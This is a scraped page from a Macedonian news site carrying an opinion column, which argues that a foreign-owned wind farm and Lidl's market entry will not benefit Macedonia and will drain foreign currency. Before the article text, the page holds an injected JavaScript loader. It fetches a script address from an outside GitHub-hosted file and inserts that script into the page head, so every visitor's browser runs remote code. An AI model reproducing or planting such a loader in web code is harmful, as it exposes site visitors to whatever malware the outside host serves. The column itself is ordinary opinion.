;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Македонија ќе нема корист од ветерната централа - Антропол
АктуелноЛокалноСтав

Македонија ќе нема корист од ветерната централа

  • Пишува: Стеван Трајковски

Владата повторно ја промовира „странската инвестиција“ во ветерна централа, меѓутоа заклучокот е ист како и пред две недели. Македонија нема да има корист од оваа централа, а може да има штета. Инвеститорот струјата ќе ја продава на берза, по пазарни цени. Ако некаде може да постигне подобра цена, струјата ќе ја продава таму.

Најстрашно е тоа што продавањето на струјата во странство е подобрата варијанта. Во тој случај, купувачот ќе ја плати струјата, сопственикот на централата ќе плати данок на добивка во Македонија, а остатокот од профитот ќе си го однесе во својата земја.

Во случај кога струјата би се продавала во Македонија, струјата ќе биде платена со македонски пари, сопственикот на централа ќе плати данок на добивка во Македонија, а остатокот од профитот ќе си го однесе во својата земја. Во тој случај ќе имаме одлив на странска валута од Македонија.

Тие 100 милиони евра плус што ќе се појават во БДП на Македонија, нема да имаат никакво значење, освен што ќе ја залажуваат јавноста дека се случило нешто позитивно, бидејќи растот на БДП бил малку поголем.

Слична ваква „инвестиција“ е и влегувањето на Лидл во Македонија. Лидл ќе носи роба што ја произведува надвор од Македонија и ќе им ја продава на нашите купувачи. На крајот ќе плати данок на добивка и остатокот од профитот ќе си го однесе во Германија (или Белизе). Македонија не само што нема да има добивка од ова, туку ќе има одлив на странска валута.

Најдобар пример за ефектот на Лидл е Грција. Странските туристи одат во Грција, трошат пари во Лидл, а Лидл тие пари ги изнесува од Грција. Како туристите да не отишле во Грција, туку во некоја друга земја.

Да се вратам на ветерните централи. Во Македонија имаше два проекти за домашни централи, од државното електростопанство.

1. Проширување на ветерната централа во Богданци.

2. Изградба на нова ветерна централа во околината на Штип.

Што се случи со овие проекти?

Што се однесува до странските инвестиции воопшто, Македонија и натаму е меѓу земјите со висока невработеност и ѝ требаат странски инвестиции. Меѓутоа и требаат инвестиции што ќе отворат нови работни места.

Македонија има дополнителен проблем, има голема текстилна индустрија, а сопствениците на компаниите постојано се жалат дека се на граница на профитабилноста и не можат да ги зголемуваат платите. Како решение, претходната влада им дозволи да донесат странски работници кои ќе работат за помалку пари од домашните.

Она што најмногу и треба на Македонија се т.н. структурни реформи, односно инвестиции во сектори со повиска профитабилност, за вработените од секторите со ниска профитабилност да се префрлат таму. Идеално решение би било за 10 години Македонија да нема текстилна индустрија и сите работници од овој сектор да работат во други сектори.